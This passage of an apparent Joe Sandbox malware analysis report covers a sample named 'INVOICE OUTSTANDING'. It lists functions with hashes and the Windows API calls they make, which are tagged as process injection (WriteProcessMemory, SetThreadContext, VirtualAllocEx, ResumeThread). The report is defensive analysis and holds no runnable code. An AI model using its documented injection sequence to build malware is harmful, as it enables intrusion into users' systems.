                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08321C9D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 62b20de9d9d5ea479023e72eb3c139b44622c9de558cd7f63263cfe29e2e77fd
                                                                                                                          • Instruction ID: f8d1b32429f03c7fdd7b57f54e811a6b811a04c2e0bb1faef26ec13ce7c87043
                                                                                                                          • Opcode Fuzzy Hash: 62b20de9d9d5ea479023e72eb3c139b44622c9de558cd7f63263cfe29e2e77fd
                                                                                                                          • Instruction Fuzzy Hash: EC2105B5900259DFCB10CF9AC985BDEBBF4FB48310F108429E818A3750D774AA54CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 083219D0 Relevance: 1.6, APIs: 1, Instructions: 68threadinjectionCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 633 83219d0-83219d2 634 83219d4-83219d5 633->634 635 83219d8-8321a24 633->635 636 8321a47-8321a5c SetThreadContext 634->636 637 83219d7 634->637 641 8321a30-8321a44 635->641 642 8321a26-8321a2e 635->642 639 8321a65-8321a86 636->639 640 8321a5e-8321a64 636->640 637->635 640->639 641->636 642->641
                                                                                                                          APIs
                                                                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 08321A4F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1591575202-0
                                                                                                                          • Opcode ID: d5a3475615413d53c1450d045278f34e7cc765b1c2cb54b1ae14950c8dfa872b
                                                                                                                          • Instruction ID: 380341ba633c6918367a1034aec1b161bdfde3f1096bdb3ee66f3805d8884911
                                                                                                                          • Opcode Fuzzy Hash: d5a3475615413d53c1450d045278f34e7cc765b1c2cb54b1ae14950c8dfa872b
                                                                                                                          • Instruction Fuzzy Hash: C3216AB1D002599FCB00CF9AC5857DEFBF8BB89610F14816AE418B3741D774A944CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08321C10 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 653 8321c10-8321c61 655 8321c63-8321c6f 653->655 656 8321c71-8321caa WriteProcessMemory 653->656 655->656 657 8321cb3-8321cd4 656->657 658 8321cac-8321cb2 656->658 658->657
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08321C9D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 96c6c7aeca54d915a38661c1e3464031fb1287df7eb3b6267abcafb685f007fa
                                                                                                                          • Instruction ID: 4520bcb310757eede07c81243db15383a1c5df519bdc47cd13a1f92facc404b2
                                                                                                                          • Opcode Fuzzy Hash: 96c6c7aeca54d915a38661c1e3464031fb1287df7eb3b6267abcafb685f007fa
                                                                                                                          • Instruction Fuzzy Hash: F421E4B5900359DFCB10CF9AC985BDEBBF4FB48314F10852AE918A3750D778A944CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014BC099 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 660 14bc099-14bc09b 661 14bc0a0-14bc134 DuplicateHandle 660->661 662 14bc13d-14bc15a 661->662 663 14bc136-14bc13c 661->663 663->662
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014BC127
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: aa8b7b569a41bf4e5bac32016fc88a16fdd0e96e61020662f2e5037fe7d8e5c1
                                                                                                                          • Instruction ID: a5a501a36779c88db366334e2c0f2781210395b6bc18d8a521c105db0e2875f5
                                                                                                                          • Opcode Fuzzy Hash: aa8b7b569a41bf4e5bac32016fc88a16fdd0e96e61020662f2e5037fe7d8e5c1
                                                                                                                          • Instruction Fuzzy Hash: BB21C6B5900258AFDB10DF9AD984ADEFBF4EB48324F14841AE954B7710D374A944CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014BC0A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014BC127
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: 773d12fb36ea0e6e567aeeb375b7fbb6418e97eae60ef0de4e8f31bb905f578e
                                                                                                                          • Instruction ID: d59e70770a5f63718c15a4c81de120c48256afa8a7b510418b4114568fb8e7eb
                                                                                                                          • Opcode Fuzzy Hash: 773d12fb36ea0e6e567aeeb375b7fbb6418e97eae60ef0de4e8f31bb905f578e
                                                                                                                          • Instruction Fuzzy Hash: F421C4B5900258AFDB10CF9AD884ADEFBF8EB48324F14841AE954B7710D374A944CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08321A93 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08321B17
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1726664587-0
                                                                                                                          • Opcode ID: 5085cc8246d14ad68c3cc38a3a9d31b5c9f95e62e5b66668320995012b04e60a
                                                                                                                          • Instruction ID: d245720b7cc42156c9b1070fd6340e622ad44bd148a79ed7fee91f26380c8212
                                                                                                                          • Opcode Fuzzy Hash: 5085cc8246d14ad68c3cc38a3a9d31b5c9f95e62e5b66668320995012b04e60a
                                                                                                                          • Instruction Fuzzy Hash: A721E2B6901259DFCB10CF9AD984BDEBBF4BB48310F10842AE558A3650D374A954CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08321A98 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08321B17
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1726664587-0
                                                                                                                          • Opcode ID: 5dd0854dd5374bf027aea9a47a66a138df773c16650d6738511c5d117bf7d350
                                                                                                                          • Instruction ID: 13308ee9d6beb61e269c492b202e18ed85e9402ec444cce9b7b00c4116b277c6
                                                                                                                          • Opcode Fuzzy Hash: 5dd0854dd5374bf027aea9a47a66a138df773c16650d6738511c5d117bf7d350
                                                                                                                          • Instruction Fuzzy Hash: B421D3B5901259DFCB10DF9AD984BDEFBF8FB48314F10842AE918A3650D374A954CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 083219D8 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 08321A4F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1591575202-0
                                                                                                                          • Opcode ID: a2b74ba9ca7e92280612601077a0bba241a6eae89f6999011cf3f9193b1e43a8
                                                                                                                          • Instruction ID: 639f78e18f03f93164971229651c9a1809c6cf07bf97d2cd5c13a9083355098d
                                                                                                                          • Opcode Fuzzy Hash: a2b74ba9ca7e92280612601077a0bba241a6eae89f6999011cf3f9193b1e43a8
                                                                                                                          • Instruction Fuzzy Hash: 5E2106B1D106599FCB00CF9AC5857EEFBF4BB48624F14816AD418B3740D778A9448FA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078BBEE8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 078BBF5B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 544645111-0
                                                                                                                          • Opcode ID: eb9f3219624edf9e5e0e69c522d3b1f3c4d46a215171e18bc6e38fc2e7b553b1
                                                                                                                          • Instruction ID: f40bffb6732a878ee2f48d2aaae3851e756362b583578b8516a3cb46e70f496a
                                                                                                                          • Opcode Fuzzy Hash: eb9f3219624edf9e5e0e69c522d3b1f3c4d46a215171e18bc6e38fc2e7b553b1
                                                                                                                          • Instruction Fuzzy Hash: 3B21E4B69006499FCB10DF9AC484BDEFBF4FB48324F108429E568A7750D778AA45CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014B8AF8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014B9A49,00000800,00000000,00000000), ref: 014B9C5A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 2e3b55618835b7b48335ff03880eb909d93780573fec0c957a47bb60ddd224cc
                                                                                                                          • Instruction ID: 62e44619271a554a1673583533a5035e6b086359cc41baa8c6ea35c8b2dcb49c
                                                                                                                          • Opcode Fuzzy Hash: 2e3b55618835b7b48335ff03880eb909d93780573fec0c957a47bb60ddd224cc
                                                                                                                          • Instruction Fuzzy Hash: 1D1100B69003099FDB10CF9AC484BDEFBF8AB49324F10842AE519A7710C778A945CFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014B9BE8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014B9A49,00000800,00000000,00000000), ref: 014B9C5A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: d83d3b7c57610f2627dfc2cf7fde0917e2c563035e14e80d09e1b30a5225f120
                                                                                                                          • Instruction ID: 1a0b055129e6fa13a661e51827c489b8f2ac3845ed2b8ce02e76a19e7e59f198
                                                                                                                          • Opcode Fuzzy Hash: d83d3b7c57610f2627dfc2cf7fde0917e2c563035e14e80d09e1b30a5225f120
                                                                                                                          • Instruction Fuzzy Hash: 031126B69003489FDB10CFAAD484BDEFBF4AB49324F14841EE519A7710C774A945CFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08321B63 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08321BD3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 96f79de1e776b922b155bdd180ccf46069f7ce76beab6a76be4149e873bcb1ac
                                                                                                                          • Instruction ID: 1d7d82b3cfa01bdc3abf06fc5caea90706ae3b2ee0ea3db23c8f12a6a2aec53f
                                                                                                                          • Opcode Fuzzy Hash: 96f79de1e776b922b155bdd180ccf46069f7ce76beab6a76be4149e873bcb1ac
                                                                                                                          • Instruction Fuzzy Hash: A01113B6800658DFCB10DF9AC985BDEBBF8FF49324F248419E528A7610D375A944CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08321B68 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08321BD3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: e9d42ed7efe4f9926b094910b712d6f04a118d65adf7878ae3f5c87238430a71
                                                                                                                          • Instruction ID: 3f775705ac8e18d49d1ea0c0bb4125168a920ed7cee315e9ac2f0017d35e214a
                                                                                                                          • Opcode Fuzzy Hash: e9d42ed7efe4f9926b094910b712d6f04a118d65adf7878ae3f5c87238430a71
                                                                                                                          • Instruction Fuzzy Hash: DC1125B6800248DFCB10DF9AC884BDEBBF8FB48324F108419E528A7610C775A944CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014B9968 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014B99CE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4139908857-0
                                                                                                                          • Opcode ID: 26910114c91425eb5025a6dceb8a9dc1890e28a0eed4e04baaa0b0ddeef69ced
                                                                                                                          • Instruction ID: 46cdda141b51940cb1d612285116db1c3489be236c79c6e791080ad7734da8b8
                                                                                                                          • Opcode Fuzzy Hash: 26910114c91425eb5025a6dceb8a9dc1890e28a0eed4e04baaa0b0ddeef69ced
                                                                                                                          • Instruction Fuzzy Hash: 2C11DFB6C006498FDB10CF9AC484BDEFBF4AB89228F14851AD569A7710C778A545CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08321DC3 Relevance: 1.5, APIs: 1, Instructions: 44threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 947044025-0
                                                                                                                          • Opcode ID: 7a0d294c3ee19f41f1a185232ab95c755cccbaf6c7afbfc9c1dc0bcddae89c36
                                                                                                                          • Instruction ID: 0e1017b03c996ad776381b812890ed9a7d1d0c14f9a56f5e70f0a5eddd5a9fb5
                                                                                                                          • Opcode Fuzzy Hash: 7a0d294c3ee19f41f1a185232ab95c755cccbaf6c7afbfc9c1dc0bcddae89c36
                                                                                                                          • Instruction Fuzzy Hash: D91103B1800659CFCB10DF9AD984BDEFBF4EB48324F24845AD519A7640C775A944CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 083226C0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 0832271D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePost
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 410705778-0
                                                                                                                          • Opcode ID: fba28bdb41cef716aa3dbd3cc29b6f511c4aacb7d408976d9582bc6c75742ef7
                                                                                                                          • Instruction ID: 56992e8744709a8293e73dfb7a2829c43287a7ec5a6e5f04484c0db28e86f932
                                                                                                                          • Opcode Fuzzy Hash: fba28bdb41cef716aa3dbd3cc29b6f511c4aacb7d408976d9582bc6c75742ef7
                                                                                                                          • Instruction Fuzzy Hash: 4611D0B6800359DFDB10DF9AD885BDEFBF8EB48724F20841AE559A7601C374A944CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08321DC8 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 947044025-0
                                                                                                                          • Opcode ID: d5368e694a0fd0abac23f69acb4979b93bc422985f8afd350360d635941c341f
                                                                                                                          • Instruction ID: 3cff3972583750598391a85663ec1673613bff89b4e3feea2cbce0471a204357
                                                                                                                          • Opcode Fuzzy Hash: d5368e694a0fd0abac23f69acb4979b93bc422985f8afd350360d635941c341f
                                                                                                                          • Instruction Fuzzy Hash: CC1112B1800258CFCB10DF9AD984BDEFBF8EB48324F20841AD419A3700C774A944CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 083226BB Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 0832271D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePost
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 410705778-0
                                                                                                                          • Opcode ID: ac248c263649129421b7513ca5d4239d9e94615fe14048b22c07067053f69246
                                                                                                                          • Instruction ID: 1afaea9bfb69395b16a8e3d4dd370e3661d499ed831ffc739033fae05919f6b7
                                                                                                                          • Opcode Fuzzy Hash: ac248c263649129421b7513ca5d4239d9e94615fe14048b22c07067053f69246
                                                                                                                          • Instruction Fuzzy Hash: C91100B6800358DFCB10DF99C985BDEFBF8EB48324F20841AD519A7601C374AA45CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 013FD4A0 Relevance: .1, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324453857.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_13fd000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9b867c50b578a18f6528894388d0b07de2e8476eeb17fe1a7d59032ce6d7f6a3
                                                                                                                          • Instruction ID: 753cd9097d5d0cbb5a412e4e9286cbb68efba1973bfe1487e094a91b01f9921d
                                                                                                                          • Opcode Fuzzy Hash: 9b867c50b578a18f6528894388d0b07de2e8476eeb17fe1a7d59032ce6d7f6a3
                                                                                                                          • Instruction Fuzzy Hash: F72125B2504244DFDB01DF94D8C8B66BF65FB8832CF24856DEA090B647C336D849CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0140D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324618530.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_140d000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 57e52fa93c045db40e8851675bc8bfb0374b4cdcab1ad929d83808406fb46443
                                                                                                                          • Instruction ID: c7537ed41b7e7329e869b436af715238cc06809565bb6daf047723b44c5ecb1e
                                                                                                                          • Opcode Fuzzy Hash: 57e52fa93c045db40e8851675bc8bfb0374b4cdcab1ad929d83808406fb46443
                                                                                                                          • Instruction Fuzzy Hash: 0D21D771904240EFDB06DFD5D9C0B26BB65FB84324F24C57EE8094B796C736D84ACA61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0140D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324618530.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_140d000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b4926f31e1648b5d0a7ee918182c4bc18d8b2f174193876dd20497c0dd4bfb11
                                                                                                                          • Instruction ID: 639d8b86aa9f5e22680a1eb9d21f6a29438f172efe8cb85288296125dc6dc18d
                                                                                                                          • Opcode Fuzzy Hash: b4926f31e1648b5d0a7ee918182c4bc18d8b2f174193876dd20497c0dd4bfb11
                                                                                                                          • Instruction Fuzzy Hash: 7321D3B1904240DFDB16DF95D8C0B16BB65EB84358F24C57AD80E4B796C336D84BCA61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0140D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324618530.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_140d000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1de071dd1900fd0cfacc045cae2ebbaf8f520038ae34801b800e5b1073e4caa9
                                                                                                                          • Instruction ID: 201d582ae1391b7384f8944a92e26287d6c13afcb63231f6838963adf9e3c3a7
                                                                                                                          • Opcode Fuzzy Hash: 1de071dd1900fd0cfacc045cae2ebbaf8f520038ae34801b800e5b1073e4caa9
                                                                                                                          • Instruction Fuzzy Hash: 592192755093808FDB03CF64D990716BF71EB46214F28C5EBD8498B6A7C33AD84ACB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 013FD49B Relevance: .1, Instructions: 56COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324453857.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_13fd000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
                                                                                                                          • Instruction ID: b5230be661e85dda9289fb82da7c0e8ac3c149a25394043f253aca32fc15f0a8
                                                                                                                          • Opcode Fuzzy Hash: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
                                                                                                                          • Instruction Fuzzy Hash: 7511B176804280DFDB12CF54D9C8B16BF71FB84328F2486ADD9090B657C33AD456CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0140D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
